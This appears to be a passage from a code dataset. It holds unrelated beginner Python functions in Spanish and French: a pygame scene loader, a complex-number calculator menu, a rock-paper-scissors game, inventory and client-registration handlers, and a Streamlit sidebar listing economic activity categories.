Reemplazo directo\n\t\tself.escena = escena\n\t\t# Reiniciar la ventana con el tamaño de la nueva escena\n\t\tprint(\"Iniciando nuevo contexto OpenGL...\")\n\t\tv_ancho, v_alto = escena.tam\n\t\topciones = OPENGL | DOUBLEBUF\n\t\tif escena.pant_compl:\n\t\t\topciones |= FULLSCREEN\n\t\tpygame.display.set_mode((v_ancho, v_alto), opciones)\n\t\t# Título por defecto de la ventana\n\t\tpygame.display.set_caption(escena.nombre)\n\t\t# Reiniciar OpenGL\n\t\tself.gl_ini(v_ancho, v_alto)\n\t\t# Darle los datos del núcleo a la ventana\n\t\tself.escena.nucleo = self\n\t\tself.escena.eventos = self.mapa_eve\n\t\tglClearColor(*escena.color)\n\t\t# Ejecutar la lógica inicial de la escena\n\t\tprint(\"Iniciando escena...\")\n\t\tself.escena.logica_ini()", "def aplicar_operacion_avanzadas(self,operacion,complejo1,exponente):\n exponente_int = int(exponente)\n nuevo_complejo = self.controlador.ejecutar_operacion_avanzada(operacion,complejo1,exponente_int)\n raices = 0\n print('\\nResultados\\n')\n if operacion == '1':# si es potencia\n nuevo_complejo.formaBinomica()\n nuevo_complejo.formaPolar()\n print('\\n')\n elif operacion == '2': # si es Raiz\n for complejo in nuevo_complejo:\n print('Raiz:',raices) \n complejo.formaBinomica()\n complejo.formaPolar()\n print('\\n')\n raices = raices + 1\n elif operacion == '3':# si es raices primitivas\n for complejo in nuevo_complejo:\n print('Raiz:',raices)\n complejo.formaBinomica()\n complejo.formaPolar()\n print('\\n')\n raices = raices + 1\n print('\\n')", "def jeu():\n\n #le pc choisit un nombre\n pc_choice = random.randint(1,3)\n\n #on change l'image en fonction de ce que montre le pc\n if pc_choice == 1:\n whatPcDoes_Button.config(image = image_boutonPierre)\n elif pc_choice == 2:\n whatPcDoes_Button.config(image = image_boutonFeuille)\n else:\n whatPcDoes_Button.config(image = image_boutonCiseaux)\n\n #on change l'image en fonction de ce que montre le joueur\n if usr_choice == 1:\n whatPlayerDoes_Button.config(image = image_boutonPierre)\n elif usr_choice == 2:\n whatPlayerDoes_Button.config(image = image_boutonFeuille)\n else:\n whatPlayerDoes_Button.config(image = image_boutonCiseaux)\n\n #actions sur la console\n print(\"le joueur choisit : \", usr_choice)\n print(\"le pc choisit : \", pc_choice)\n #application des règles du jeu\n fonctions_pfc.regles_jeu(usr_choice,pc_choice)\n #on réactive les boutons pierre feuille et ciseaux\n enable()\n\n #on affiche si le joueur perd ou gagne\n LabelResultats.config(text=fonctions_pfc.result)\n\n #on affiche le score du pc\n LabelScorePc.config(text=fonctions_pfc.pc_score,font=(\"Berlin Sans FB Demi\",15))\n LabelScoreJoueur.config(text=fonctions_pfc.usr_score,font=(\"Berlin Sans FB Demi\",15))\n\n #FIXER LA LIMITE DU SCORE POUR GAGNER -->le premier arrivé à 10 à gagner\n if fonctions_pfc.y == 5:\n print(\"le pc a gagné la partie ! \")\n undisplay_pack_component()\n boutonEnd.pack(expand='YES')\n elif fonctions_pfc.x == 5:\n print(\"le joueur a gagné la partie ! \")\n undisplay_pack_component()\n boutonEnd.pack(expand='YES')", "def regLA(): # Esta sección fue hecha por Ángel\n print(\"A continuación se muestra la lista de productos en el inventario: \")\n creaLprod(creaLI(\"Inventario\"))\n resp = 1\n while resp == 1:\n fecha = input(\"Fecha de llegada del articulo(dd/mm/aa): \")\n producto = int(input(\"Introduce el número del producto reabastecido: \"))\n cantiProd = int(input(\"Ingresa la cantidad que fue reabastecida: \")) \n geneRegLleg(fecha, producto, cantiProd)\n listaaIM = crearLBI()\n geneALlegA(crearLIA(actualizarLInv(producto, listaaIM, cantiProd)))\n resp = int(input(\"Llegaron más artículos 1. Sí 2. No: \"))\n if resp == \"2\":\n menu(listaUCE)", "def elegir_operacion_avanzada(self):\n \n while True:\n input_operacion_avanzada = input('Elegir operacion\\n1. Potencia\\n2. Radicacion\\n3. Raices primitivas\\n')\n if input_operacion_avanzada == '1':\n break\n elif input_operacion_avanzada == '2':\n break\n elif input_operacion_avanzada == '3':\n break\n else: \n print('Elegir la correcta operacion avanzada') \n \n self.entrada_operacion_avanzada(input_operacion_avanzada)", "def pedir_opcion(cantidad = SALIR):\n return verif_ingreso(input(\"Su elección: \"), cantidad, \"Ingrese un número de opción: \")", "def iniciarEntradas(self):\n tituloEntry = self.crearEntrada(self.master, self.tituloString, 30, 1, 1)\n descripcionEntry = self.crearEntrada(self.master, self.descripcionString, 30, 2, 1)", "def on_btnAltacli_clicked(self, widget):\n try:\n dni = variables.filacli[0].get_text()\n apel = variables.filacli[1].get_text()\n nome = variables.filacli[2].get_text()\n data = variables.filacli[3].get_text()\n registro = (dni, apel, nome, data)\n if funcionescli.validoDNI(dni):\n funcionescli.insertarcli(registro)\n funcionescli.listadocli(variables.listclientes)\n funcionescli.limpiarentry(variables.filacli)\n else:\n variables.menslabel[0].set_text('ERROR DNI')\n except:\n print(\"Error alta cliente\")", "def input_usuario(self):\n print(\"Elegir Nivel de operacion\\n\")\n while True:\n input_complejo = self.elegir_nivel_operacion()\n \n if input_complejo == '1':\n self.elegir_operacion_basica()\n elif input_complejo == '2':\n self.elegir_operacion_avanzada()\n elif input_complejo == '3':\n self.entrada_operacion_fasores()\n elif input_complejo == 'x' or input_complejo == 'X':\n print('Programa finalizado')\n sys.exit()\n else:\n print('Elegir el Nivel de operacion correcta\\n')", "def run():\n \n contrasena = generar_contrasena()\n print('Tu nueva contraseña es: ' + contrasena)", "def get_user_input():\n st.sidebar.header('Parámetros de entrada') \n acti2 = st.sidebar.selectbox('Código de Actividad Económica', ['ACABADO DE PRODUCTOS TEXTILES',\n 'ACTIVIDADES COMBINADAS DE SERVICIOS ADMINISTRATIVOS DE OFICINA', \n 'ACTIVIDADES CREATIVAS, ARTÍSTICAS Y DE ENTRETENIMIENTO', \n 'ACTIVIDADES DE AGENCIAS DE COBRO Y AGENCIAS DE CALIFICACIÓN CREDITICIA', \n 'ACTIVIDADES DE AGENCIAS DE EMPLEO', \n 'ACTIVIDADES DE AGENCIAS DE VIAJES', \n 'ACTIVIDADES DE AGENTES Y CORREDORES DE SEGUROS', \n 'ACTIVIDADES DE ALOJAMIENTO PARA ESTANCIAS CORTAS', \n 'ACTIVIDADES DE APOYO A LA ENSEÑANZA', \n 'ACTIVIDADES DE APOYO PARA LA EXTRACCIÓN DE PETRÓLEO Y GAS NATURAL', \n 'ACTIVIDADES DE APOYO PARA OTRAS ACTIVIDADES DE EXPLOTACIÓN DE MINAS Y CANTERAS', \n 'ACTIVIDADES DE ARQUITECTURA E INGENIERÍA Y ACTIVIDADES CONEXAS DE CONSULTORÍA TÉCNICA', \n 'ACTIVIDADES DE ASOCIACIONES EMPRESARIALES Y DE EMPLEADORES', \n 'ACTIVIDADES DE ASOCIACIONES PROFESIONALES', \n 'ACTIVIDADES DE ATENCIÓN DE ENFERMERÍA EN INSTITUCIONES', \n 'ACTIVIDADES DE BIBLIOTECAS Y ARCHIVOS', \n 'ACTIVIDADES DE CENTROS DE LLAMADAS', \n 'ACTIVIDADES DE CLUBES DEPORTIVOS', \n 'ACTIVIDADES DE CONSULTORÍA DE GESTIÓN', \n 'ACTIVIDADES DE CONTABILIDAD, TENEDURÍA DE LIBROS Y AUDITORÍA; CONSULTORÍA FISCAL', \n 'ACTIVIDADES DE DESCONTAMINACIÓN Y OTROS SERVICIOS DE GESTIÓN DE DESECHOS', \n 'ACTIVIDADES DE DISTRIBUCIÓN DE PELÍCULAS CINEMATOGRÁFICAS, VÍDEOS Y PROGRAMAS DE TELEVISIÓN', \n 'ACTIVIDADES DE ENVASADO Y EMPAQUETADO', \n 'ACTIVIDADES DE EXHIBICIÓN DE PELÍCULAS CINEMATOGRÁFICAS Y CINTAS DE VÍDEO', \n 'ACTIVIDADES DE FOTOGRAFÍA', \n 'ACTIVIDADES DE GESTIÓN DE FONDOS', \n 'ACTIVIDADES DE HOSPITALES', \n 'ACTIVIDADES DE INVESTIGACIÓN', \n 'ACTIVIDADES DE JARDINES BOTÁNICOS Y ZOOLÓGICOS Y RESERVAS NATURALES', \n 'ACTIVIDADES DE JUEGOS DE AZAR Y APUESTAS', \n 'ACTIVIDADES DE MENSAJERÍA', \n 'ACTIVIDADES DE MUSEOS Y GESTIÓN DE LUGARES Y EDIFICIOS HISTÓRICOS', \n 'ACTIVIDADES DE MÉDICOS Y ODONTÓLOGOS', \n 'ACTIVIDADES DE OFICINAS CENTRALES', \n 'ACTIVIDADES DE OPERADORES TURÍSTICOS', \n 'ACTIVIDADES DE ORGANIZACIONES RELIGIOSAS', \n 'ACTIVIDADES DE OTRAS ASOCIACIONES N.C.P.', \n 'ACTIVIDADES DE PARQUES DE ATRACCIONES Y PARQUES TEMÁTICOS', \n 'ACTIVIDADES DE PRODUCCIÓN DE PELÍCULAS CINEMATOGRÁFICAS, VÍDEOS Y PROGRAMAS DE TELEVISIÓN', \n 'ACTIVIDADES DE RESTAURANTES Y DE SERVICIO MÓVIL DE COMIDAS', \n 'ACTIVIDADES DE SEGURIDAD PRIVADA', \n 'ACTIVIDADES DE SERVICIO DE BEBIDAS', \n 'ACTIVIDADES DE SERVICIO DE SISTEMAS DE SEGURIDAD', \n 'ACTIVIDADES DE SERVICIOS RELACIONADAS CON LA IMPRESIÓN', \n 'ACTIVIDADES DE SERVICIOS VINCULADAS AL TRANSPORTE ACUÁTICO', \n 'ACTIVIDADES DE SERVICIOS VINCULADAS AL TRANSPORTE AÉREO', \n 'ACTIVIDADES DE SERVICIOS VINCULADAS AL TRANSPORTE TERRESTRE', \n 'ACTIVIDADES DE TELECOMUNICACIONES ALÁMBRICAS', \n 'ACTIVIDADES DE TELECOMUNICACIONES INALÁMBRICAS', \n 'ACTIVIDADES DE TELECOMUNICACIONES POR SATÉLITE.', \n 'ACTIVIDADES ESPECIALIZADAS DE DISEÑO', \n 'ACTIVIDADES INMOBILIARIAS REALIZADAS A CAMBIO DE UNA RETRIBUCIÓN O POR CONTRATA', \n 'ACTIVIDADES INMOBILIARIAS REALIZADAS CON BIENES PROPIOS O ARRENDADOS', \n 'ACTIVIDADES JURÍDICAS', \n 'ACTIVIDADES POSTALES', \n 'ACTIVIDADES VETERINARIAS', \n 'ACUICULTURA DE AGUA DULCE', \n 'ACUICULTURA MARÍTIMA', \n 'ADMINISTRACIÓN DE MERCADOS FINANCIEROS', \n 'ALMACENAMIENTO Y DEPÓSITO', \n 'ALQUILER Y ARRENDAMIENTO DE OTROS EFECTOS PERSONALES Y ENSERES DOMÉSTICOS', \n 'ALQUILER Y ARRENDAMIENTO DE OTROS TIPOS DE MAQUINARIA, EQUIPO Y BIENES TANGIBLES', \n 'ALQUILER Y ARRENDAMIENTO DE VEHÍCULOS AUTOMOTORES', \n 'ARRENDAMIENTO DE PROPIEDAD INTELECTUAL Y PRODUCTOS SIMILARES, EXCEPTO OBRAS PROTEGIDAS POR DERECHOS DE AUTOR', \n 'ARRENDAMIENTO FINANCIERO', \n 'ASERRADOS Y ACEPILLADURA DE MADERA', \n 'CAPTACIÓN, TRATAMIENTO Y DISTRIBUCIÓN DE AGUA', \n 'CONSTRUCCIÓN DE BUQUES Y ESTRUCTURAS FLOTANTES', \n 'CONSTRUCCIÓN DE CARRETERAS Y LÍNEAS DE FERROCARRIL', \n 'CONSTRUCCIÓN DE EDIFICIOS', \n 'CONSTRUCCIÓN DE OTRAS OBRAS DE INGENIERÍA CIVIL', \n 'CONSTRUCCIÓN DE PROYECTOS DE SERVICIO PÚBLICO', \n 'CONSULTORÍA DE INFORMÁTICA Y DE GESTIÓN DE INSTALACIONES INFORMÁTICAS', \n 'CORRETAJE DE VALORES Y DE CONTRATOS DE PRODUCTOS BÁSICOS', \n 'CORTE, TALLA Y ACABADO DE LA PIEDRA', \n 'CURTIDO Y ADOBO DE CUEROS', \n 'DESTILACIÓN, RECTIFICACIÓN Y MEZCLA DE BEBIDAS ALCOHÓLICAS', \n 'EDICIÓN DE LIBROS', \n 'EDICIÓN DE PERIÓDICOS, REVISTAS Y OTRAS PUBLICACIONES PERIÓDICAS', \n 'EDUCACIÓN DEPORTIVA Y RECREATIVA', \n 'ELABORACIÒN Y CONSERVACIÓN DE CARNE', \n 'ELABORACIÒN Y CONSERVACIÓN DE FRUTAS,LEGUMBRES Y HORTALIZAS', \n 'ELABORACIÒN Y CONSERVACIÓN DE PESCADOS, CRUSTÁCEOS Y MOLUSCOS', \n 'ELABORACIÓN DE ACEITES Y GRASAS DE ORIGEN VEGETAL Y ANIMAL', \n 'ELABORACIÓN DE AZÚCAR', \n 'ELABORACIÓN DE BEBIDAS MALTEADAS Y DE MALTA', \n 'ELABORACIÓN DE BEBIDAS NO ALCOHÓLICAS', \n 'ELABORACIÓN DE CACAO Y CHOCOLATE Y DE PRODUCTOS DE CONFITERÍA', \n 'ELABORACIÓN DE COMIDAS Y PLATOS PREPARADOS', \n 'ELABORACIÓN DE MACARRONES, FIDEOS, ALCUZCUS Y PRODUCTOS FARINÁCEOS SIMILARES', \n 'ELABORACIÓN DE OTROS PRODUCTOS ALIMENTICIOS N.C.P.', \n 'ELABORACIÓN DE PIENSOS PREPARADOS PARA ANIMALES', \n 'ELABORACIÓN DE PRODUCTOS DE MOLINERÍA.', \n 'ELABORACIÓN DE PRODUCTOS DE PANADERÍA', \n 'ELABORACIÓN DE PRODUCTOS LÁCTEOS', \n 'ELABORACIÓN DE VINOS', \n 'ENSAYOS Y ANÁLISIS TÉCNICOS', \n 'ENSEÑANZA CULTURAL', \n 'ENSEÑANZA PREESCOLAR Y PRIMARIA', \n 'ENSEÑANZA SECUNDARIA DE FORMACIÓN GENERAL', \n 'ENSEÑANZA SECUNDARIA DE FORMACIÓN TÉCNICA Y PROFESIONAL', \n 'ENSEÑANZA SUPERIOR', \n 'ESTUDIOS DE MERCADO Y ENCUESTAS DE OPINIÓN PÚBLICA', \n 'EVACUACIÓN DE AGUAS RESIDUALES', \n 'EXPLOTACIÓN DE OTRAS MINAS Y CANTERAS N.C.P.', \n 'EXTRACCIÓN DE CARBÓN DE PIEDRA', \n 'EXTRACCIÓN DE GAS NATURAL', \n 'EXTRACCIÓN DE MINERALES DE HIERRO', \n 'EXTRACCIÓN DE MINERALES PARA LA FABRICACIÓN DE ABONOS Y PRODUCTOS QUÍMICOS', \n 'EXTRACCIÓN DE OTROS MINERALES METALÍFEROS NO FERROSOS', \n 'EXTRACCIÓN DE PETRÓLEO CRUDO', \n 'EXTRACCIÓN DE PIEDRA, ARENA Y ARCILLA', \n 'EXTRACCIÓN DE SAL', \n 'FABRICACIÓN ABONOS Y COMPUESTOS DE NITRÓGENO', \n 'FABRICACIÓN DE APARATOS DE USO DOMÉSTICO', \n 'FABRICACIÓN DE ARTICULOS DE PUNTO Y GANCHILLO', \n 'FABRICACIÓN DE ARTÍCULOS CONFECCIONADOS DE MATERIALES TEXTILES, EXCEPTO PRENDAS DE VESTIR', \n 'FABRICACIÓN DE ARTÍCULOS DE CUCHILLERÍA, HERRAMIENTAS DE MANO Y ARTÍCULOS DE FERRETERÍA', \n 'FABRICACIÓN DE ARTÍCULOS DE DEPORTE', \n 'FABRICACIÓN DE ARTÍCULOS DE HORMIGÓN, DE CEMENTO Y DE YESO', \n 'FABRICACIÓN DE ARTÍCULOS DE PIEL', \n 'FABRICACIÓN DE BICICLETAS Y DE SILLONES DE RUEDAS PARA INVÁLIDOS', \n 'FABRICACIÓN DE BISUTERÍA Y ARTÍCULOS CONEXOS', \n 'FABRICACIÓN DE BOMBAS, COMPRESORES, GRIFOS Y VÁLVULAS', \n 'FABRICACIÓN DE CALZADO', \n 'FABRICACIÓN DE CARROCERÍAS PARA VEHÍCULOS AUTOMOTORES', \n 'FABRICACIÓN DE CEMENTO, CAL Y YESO', \n 'FABRICACIÓN DE COMPONENTES Y TABLEROS ELECTRÓNICOS', \n 'FABRICACIÓN DE CUBIERTAS Y CÁMARAS DE CAUCHO', \n 'FABRICACIÓN DE CUERDAS, CORDELES, BRAMANTES Y REDES', \n 'FABRICACIÓN DE EQUIPO DE ELEVACIÓN Y MANIPULACIÓN', \n 'FABRICACIÓN DE EQUIPO DE IRRADIACIÓN Y EQUIPO ELECTRÓNICO DE USO MÉDICO Y TERAPÉUTICO', \n 'FABRICACIÓN DE EQUIPO ELÉCTRICO DE ILUMINACIÓN', \n 'FABRICACIÓN DE FIBRAS ARTIFICIALES', \n 'FABRICACIÓN DE HERRAMIENTAS DE MANO MOTORIZADAS', \n 'FABRICACIÓN DE HOJAS DE MADERA PARA ENCHAPADO Y TABLEROS A BASE DE MADERA', \n 'FABRICACIÓN DE INSTRUMENTOS Y MATERIALES MÉDICOS Y ODONTOLÓGICOS', \n 'FABRICACIÓN DE INSTRUMENTOS ÓPTICOS Y EQUIPO FOTOGRÁFICO', \n 'FABRICACIÓN DE JABONES Y DETERGENTES, PREPARADOS PARA LIMPIAR Y PULIR, PERFUMES Y PREPARADOS DE TOCADOR.', \n 'FABRICACIÓN DE JOYAS Y ARTÍCULOS CONEXOS', \n 'FABRICACIÓN DE JUEGOS Y JUGUETES', \n 'FABRICACIÓN DE MALETAS, BOLSOS DE MANO, Y ARTÍCULOS SIMILARES,Y DE ARTICULOS DE TALABARTERÍA Y GUARNICIONERÍA', \n 'FABRICACIÓN DE MAQUINARIA AGROPECUARIA Y FORESTAL', \n 'FABRICACIÓN DE MAQUINARIA METALÚRGICA', \n 'FABRICACIÓN DE MAQUINARIA PARA EXPLOTACIÓN DE MINAS Y CANTERAS Y PARA OBRAS DE CONSTRUCCIÓN', \n 'FABRICACIÓN DE MAQUINARIA PARA LA ELABORACIÓN DE ALIMENTOS, BEBIDAS Y TABACO', \n 'FABRICACIÓN DE MATERIALES DE CONSTRUCCIÓN DE ARCILLA', \n 'FABRICACIÓN DE MOTOCICLETAS', \n 'FABRICACIÓN DE MOTORES Y TURBINAS, EXCEPTO MOTORES PARA AERONAVES, VEHÍCULOS AUTOMOTORES Y MOTOCICLETAS', \n 'FABRICACIÓN DE MOTORES, GENERADORES Y TRANSFORMADORES ELÉCTRICOS Y APARATOS DE DISTRIBUCIÓN Y CONTROL DE LA ENERGÍA ELÉCTRICA', \n 'FABRICACIÓN DE MUEBLES', \n 'FABRICACIÓN DE OTROS ARTÍCULOS DEL PAPEL Y CARTÓN', \n 'FABRICACIÓN DE OTROS HILOS Y CABLES ELÉCTRICOS', \n 'FABRICACIÓN DE OTROS PRODUCTOS DE CAUCHO', \n 'FABRICACIÓN DE OTROS PRODUCTOS DE MADERA; FABRICACIÓN DE ARTÍCULOS DE CORCHO, PAJA Y MATERIALES TRENZABLES.', \n 'FABRICACIÓN DE OTROS PRODUCTOS DE PORCELANA Y DE CERÁMICA', \n 'FABRICACIÓN DE OTROS PRODUCTOS ELABORADOS DE METAL N.C.P.', \n 'FABRICACIÓN DE OTROS PRODUCTOS MINERALES NO METÁLICOS N.C.P.', \n 'FABRICACIÓN DE OTROS PRODUCTOS QUÍMICOS N.C.P.', \n 'FABRICACIÓN DE OTROS PRODUCTOS TEXTILES N.C.P.', \n 'FABRICACIÓN DE OTROS TIPOS DE EQUIPO DE TRANSPORTE N.C.P.', \n 'FABRICACIÓN DE OTROS TIPOS DE EQUIPO ELÉCTRICO', \n 'FABRICACIÓN DE OTROS TIPOS DE MAQUINARIA DE USO ESPECIAL', \n 'FABRICACIÓN DE OTROS TIPOS DE MAQUINARIA DE USO GENERAL', \n 'FABRICACIÓN DE PARTES Y PIEZAS DE CARPINTERÍA PARA EDIFICIOS Y CONSTRUCCIONES', \n 'FABRICACIÓN DE PARTES, PIEZAS Y ACCESORIOS PARA VEHÍCULOS DE AUTOMOTORES', \n 'FABRICACIÓN DE PASTA DE MADERA, PAPEL Y CARTÓN', \n 'FABRICACIÓN DE PILAS, BATERÍAS Y ACUMULADORES', \n 'FABRICACIÓN DE PINTURAS, BARNICES Y PRODUCTOS DE REVESTIMIENTO SIMILARES, TINTAS DE IMPRENTA Y MASILLAS', \n 'FABRICACIÓN DE PLAGUICIDAS Y OTROS PRODUCTOS QUÍMICOS DE USO AGROPECUARIO', \n 'FABRICACIÓN DE PLÁSTICOS Y DE CAUCHO SINTÉTICO EN FORMAS PRIMARIAS', \n 'FABRICACIÓN DE PRENDAS DE VESTIR, EXCEPTO PRENDAS DE PIEL', \n 'FABRICACIÓN DE PRODUCTOS DE LA REFINACIÓN DEL PETRÓLEO', \n 'FABRICACIÓN DE PRODUCTOS DE PLÁSTICO', \n 'FABRICACIÓN DE PRODUCTOS FARMACÉUTICOS, SUSTANCIAS QUÍMICAS MEDICINALES Y PRODUCTOS BOTÁNICOS DE USO FARMACÉUTICO', \n 'FABRICACIÓN DE PRODUCTOS METÁLICOS PARA USO ESTRUCTURAL', \n 'FABRICACIÓN DE PRODUCTOS PRIMARIOS DE METALES PRECIOSOS Y OTROS METALES NO FERROSOS', \n 'FABRICACIÓN DE PRODUCTOS REFRACTARIOS', \n 'FABRICACIÓN DE RECIPIENTES DE MADERA', \n 'FABRICACIÓN DE SUSTANCIAS QUÍMICAS BÁSICAS', \n 'FABRICACIÓN DE TANQUES, DEPÓSITOS Y RECIPIENTES DE METAL', \n 'FABRICACIÓN DE TAPICES Y ALFOMBRAS', \n 'FABRICACIÓN DE TEJIDOS DE PUNTO Y GANCHILLO', \n 'FABRICACIÓN DE VEHÍCULOS AUTOMOTORES', \n 'FABRICACIÓN DE VIDRIO Y DE PRODUCTOS DE VIDRIO', \n 'FABRICACIÓN DEL GAS', \n 'FABRICACIÓN DEL PAPEL Y CARTÓN ONDULADO Y DE ENVASES DE PAPEL Y CARTÓN', \n 'FONDOS DE PENSIONES', \n 'FONDOS Y SOCIEDADES DE INVERSIÓN Y ENTIDADES FINANCIERAS SIMILARES', \n 'FORJA, PRENSADO, ESTAMPADO Y LAMINADO DE METALES; PULVIMETALURGIA', \n 'FOTOCOPIADO, PREPARACIÓN DE DOCUMENTOS Y OTRAS ACTIVIDADES ESPECIALIZADAS DE APOYO DE OFICINA', \n 'FUNDICIÓN DE HIERRO Y ACERO', \n 'FUNDICIÓN DE METALES NO FERROSOS', \n 'GENERACIÓN, TRANSMISIÓN Y DISTRIBUCIÓN DE ENERGÍA ELÉCTRICA', \n 'GESTIÓN DE INSTALACIONES DEPORTIVAS', \n 'IMPRESIÓN', \n 'INDUSTRIAS BÁSICAS DE HIERRO Y ACERO', \n 'INSTALACIONES DE FONTANERÍA, CALEFACCIÓN Y AIRE ACONDICIONADO', \n 'INSTALACIONES ELÉCTRICAS', \n 'INSTALACIÓN DE MAQUINARIA Y EQUIPO INDUSTRIALES', \n 'INVESTIGACIÓN Y DESARROLLO EXPERIMENTAL EN EL CAMPO DE LAS CIENCIAS NATURALES Y LA INGENIERÍA', \n 'INVESTIGACIÓN Y DESARROLLO EXPERIMENTAL EN EL CAMPO DE LAS CIENCIAS SOCIALES Y LAS HUMANIDADES', \n 'LAVADO Y LIMPIEZA, INCLUIDA LA LIMPIEZA EN SECO, DE PRODUCTOS TEXTILES Y DE PIEL', \n 'LIMPIEZA GENERAL DE EDIFICIOS', \n 'MANIPULACIÓN DE CARGA', \n 'MANTENIMIENTO Y REPARACIÓN DE VEHÍCULOS AUTOMOTORES', \n 'ORGANIZACIÓN DE CONVENCIONES Y EXPOSICIONES COMERCIALES', \n 'OTRAS ACTIVIDADES AUXILIARES DE LAS ACTIVIDADES DE SEGUROS Y FONDOS DE PENSIONES', \n 'OTRAS ACTIVIDADES AUXILIARES DE LAS ACTIVIDADES DE SERVICIOS FINANCIEROS', \n 'OTRAS ACTIVIDADES DE ALOJAMIENTO', \n 'OTRAS ACTIVIDADES DE APOYO AL TRANSPORTE', \n 'OTRAS ACTIVIDADES DE ASISTENCIA SOCIAL SIN ALOJAMIENTO', \n 'OTRAS ACTIVIDADES DE ATENCIÓN DE LA SALUD HUMANA', \n 'OTRAS ACTIVIDADES DE ATENCIÓN EN INSTITUCIONES', \n 'OTRAS ACTIVIDADES DE CONCESIÓN DE CRÉDITO', \n 'OTRAS ACTIVIDADES DE DOTACIÓN DE RECURSOS HUMANOS', \n 'OTRAS ACTIVIDADES DE EDICIÓN', \n 'OTRAS ACTIVIDADES DE ESPARCIMIENTO Y RECREATIVAS N.C.P.', \n 'OTRAS ACTIVIDADES DE LIMPIEZA DE EDIFICIOS E INSTALACIONES INDUSTRIALES', \n 'OTRAS ACTIVIDADES DE SERVICIO DE COMIDAS', \n 'OTRAS ACTIVIDADES DE SERVICIOS DE APOYO A LAS EMPRESAS N.C.P', \n 'OTRAS ACTIVIDADES DE SERVICIOS DE INFORMACIÓN N.C.P.', \n 'OTRAS ACTIVIDADES DE SERVICIOS FINANCIEROS, EXCEPTO LAS DE SEGUROS Y FONDOS DE PENSIONES, N.C.P.', \n 'OTRAS ACTIVIDADES DE SERVICIOS PERSONALES N.C.P.', \n 'OTRAS ACTIVIDADES DE TECNOLOGÍA DE LA INFORMACIÓN Y DE SERVICIOS INFORMÁTICOS', \n 'OTRAS ACTIVIDADES DE TELECOMUNICACIÓN.', \n 'OTRAS ACTIVIDADES DE TRANSPORTE POR VÍA TERRESTRE', \n 'OTRAS ACTIVIDADES DE VENTA AL POR MENOR EN COMERCIOS NO ESPECIALIZADOS', \n 'OTRAS ACTIVIDADES DE VENTA AL POR MENOR NO REALIZADAS EN COMERCIOS, PUESTOS DE VENTA O MERCADOS', \n 'OTRAS ACTIVIDADES DEPORTIVAS', \n 'OTRAS ACTIVIDADES ESPECIALIZADAS DE LA CONSTRUCCIÓN', \n 'OTRAS ACTIVIDADES PROFESIONALES, CIENTÍFICAS Y TÉCNICAS N.C.P.', \n 'OTRAS INDUSTRIAS MANUFACTURERAS N.C.P.', \n 'OTRAS INSTALACIONES PARA OBRAS DE CONSTRUCCIÓN', \n 'OTROS SERVICIOS DE RESERVAS Y ACTIVIDADES CONEXAS', \n 'OTROS TIPOS DE ENSEÑANZA N.C.P.', \n 'OTROS TIPOS DE INTERMEDIACIÓN MONETARIA.', \n 'PELUQUERÍA Y OTROS TRATAMIENTOS DE BELLEZA', \n 'PESCA DE AGUA DULCE', \n 'PESCA MARÍTIMA', \n 'POMPAS FÚNEBRES Y ACTIVIDADES CONEXAS', \n 'PORTALES WEB', \n 'PREPARACIÓN DEL TERRENO', \n 'PREPARACIÓN E HILATURA DE FIBRAS TEXTILES', \n 'PROCESAMIENTO DE DATOS, HOSPEDAJE Y ACTIVIDADES CONEXAS', \n 'PROGRAMACIÓN INFORMÁTICA', \n 'PROGRAMACIÓN Y TRANSMISIONES DE TELEVISIÓN', \n 'PUBLICIDAD', \n 'RECOGIDA DE DESECHOS NO PELIGROSOS', \n 'RECOGIDA DE DESECHOS PELIGROSOS', \n 'RECUPERACIÓN DE MATERIALES', \n 'REPARACIÓN DE APARATOS DE USO DOMÉSTICO Y EQUIPO DOMÉSTICO Y DE JARDINERÍA', \n 'REPARACIÓN DE APARATOS ELECTRÓNICOS DE CONSUMO', \n 'REPARACIÓN DE EQUIPO DE TRANSPORTE, EXCEPTO VEHÍCULOS AUTOMOTORES', \n 'REPARACIÓN DE EQUIPO ELÉCTRICO', \n 'REPARACIÓN DE EQUIPOS COMUNICACIONALES', \n 'REPARACIÓN DE MAQUINARIA', \n 'REPARACIÓN DE ORDENADORES Y EQUIPO PERIFÉRICO', \n 'REPARACIÓN DE OTROS TIPOS DE EQUIPO', \n 'REPARACIÓN DE PRODUCTOS ELABORADOS DE METAL', \n 'SEGUROS DE VIDA', \n 'SEGUROS GENERALES', \n 'SUMINISTRO DE COMIDAS POR ENCARGO', \n 'SUMINISTRO DE VAPOR Y AIRE ACONDICIONADO', \n 'TEJEDURA DE PRODUCTOS TEXTILES', \n 'TERMINACIÓN Y ACABADO DE EDIFICIOS', \n 'TRANSMISIONES DE RADIO', \n 'TRANSPORTE DE CARGA MARÍTIMO Y DE CABOTAJE', \n 'TRANSPORTE DE CARGA POR CARRETERA', \n 'TRANSPORTE DE CARGA POR FERROCARRIL', \n 'TRANSPORTE DE CARGA POR VÍA AÉREA', \n 'TRANSPORTE DE CARGA, POR VÍAS DE NAVEGACIÓN INTERIORES', \n 'TRANSPORTE DE PASAJEROS MARÍTIMO Y DE CABOTAJE', \n 'TRANSPORTE DE PASAJEROS POR VÍA AÉREA', \n 'TRANSPORTE DE PASAJEROS POR VÍAS DE NAVEGACIÓN INTERIORES', \n 'TRANSPORTE INTERURBANO DE PASAJEROS POR FERROCARRIL', \n 'TRANSPORTE URBANO Y SUBURBANO DE PASAJEROS POR VÍA TERRESTRE', \n 'TRATAMIENTO Y ELIMINACIÓN DE DESECHOS NO PELIGROSOS', \n 'TRATAMIENTO Y ELIMINACIÓN DE DESECHOS PELIGROSOS', \n 'TRATAMIENTO Y REVESTIMIENTO DE METALES', \n 'VENTA AL POR MAYOR A CAMBIO DE UNA RETRIBUCIÓN O POR CONTRATA', \n 'VENTA AL POR MAYOR DE ALIMENTOS, BEBIDAS Y TABACO.', \n 'VENTA AL POR MAYOR DE COMBUSTIBLES SÓLIDOS, LÍQUIDOS Y GASEOSOS Y PRODUCTOS CONEXOS', \n 'VENTA AL POR MAYOR DE DESPERDICIOS, DESECHOS, CHATARRA Y OTROS PRODUCTOS N.C.P', \n 'VENTA AL POR MAYOR DE EQUIPO, PARTES Y PIEZAS ELECTRÓNICOS Y DE TELECOMUNICACIONES', \n 'VENTA AL POR MAYOR DE MAQUINARIA, EQUIPO Y MATERIALES AGROPECUARIOS', \n 'VENTA AL POR MAYOR DE MATERIALES DE CONSTRUCCIÓN, ARTÍCULOS DE FERRETERÍA Y EQUIPO Y MATERIALES DE FONTANERÍA Y CALEFACCIÓN.', \n 'VENTA AL POR MAYOR DE MATERIAS PRIMAS AGROPECUARIAS Y ANIMALES VIVOS.', 